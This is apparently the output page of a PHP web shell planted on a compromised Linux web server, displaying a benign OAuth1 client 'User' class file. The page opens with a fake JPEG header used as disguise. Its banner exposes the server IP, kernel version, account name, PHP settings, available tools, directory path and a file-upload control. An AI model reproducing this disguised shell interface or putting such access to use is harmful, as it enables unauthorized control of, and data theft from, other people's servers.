ÿØÿà JFIF H H ÿÛ C ÿÛ Cÿ " ÿÄ ÿÄ ÿÚ ±5¬€ ÿÄ àÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÄ àÿÚ ?! ÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÙ
| Server IP : 160.25.81.117 / Your IP : 216.73.216.137 Web Server : Apache/2 System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : bellizen ( 1045) PHP Version : 7.2.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/bellizen/public_html/vaoday/vendor/league/oauth1-client/src/Client/Server/ |
Upload File : |
<?php
namespace League\OAuth1\Client\Server;
class User implements \IteratorAggregate
{
/**
* The user's unique ID.
*
* @var mixed
*/
public $uid = null;
/**
* The user's nickname (screen name, username etc).
*
* @var mixed
*/
public $nickname = null;
/**
* The user's name.
*
* @var mixed
*/
public $name = null;
/**
* The user's first name.
*
* @var string
*/
public $firstName = null;
/**
* The user's last name.
*
* @var string
*/
public $lastName = null;
/**
* The user's email.
*
* @var string
*/
public $email = null;
/**
* The user's location.
*
* @var string|array
*/
public $location = null;
/**
* The user's description.
*
* @var string
*/
public $description = null;
/**
* The user's image URL.
*
* @var string
*/
public $imageUrl = null;
/**
* The users' URLs.
*
* @var string|array
*/
public $urls = array();
/**
* Any extra data.
*
* @var array
*/
public $extra = array();
/**
* Set a property on the user.
*
* @param string $key
* @param mixed $value
*/
public function __set($key, $value)
{
if (isset($this->{$key})) {
$this->{$key} = $value;
}
}
/**
* Get a property from the user.
*
* @param string $key
*
* @return mixed
*/
public function __get($key)
{
if (isset($this->{$key})) {
return $this->{$key};
}
}
/**
* {@inheritDoc}
*/
public function getIterator()
{
return new \ArrayIterator($this);
}
}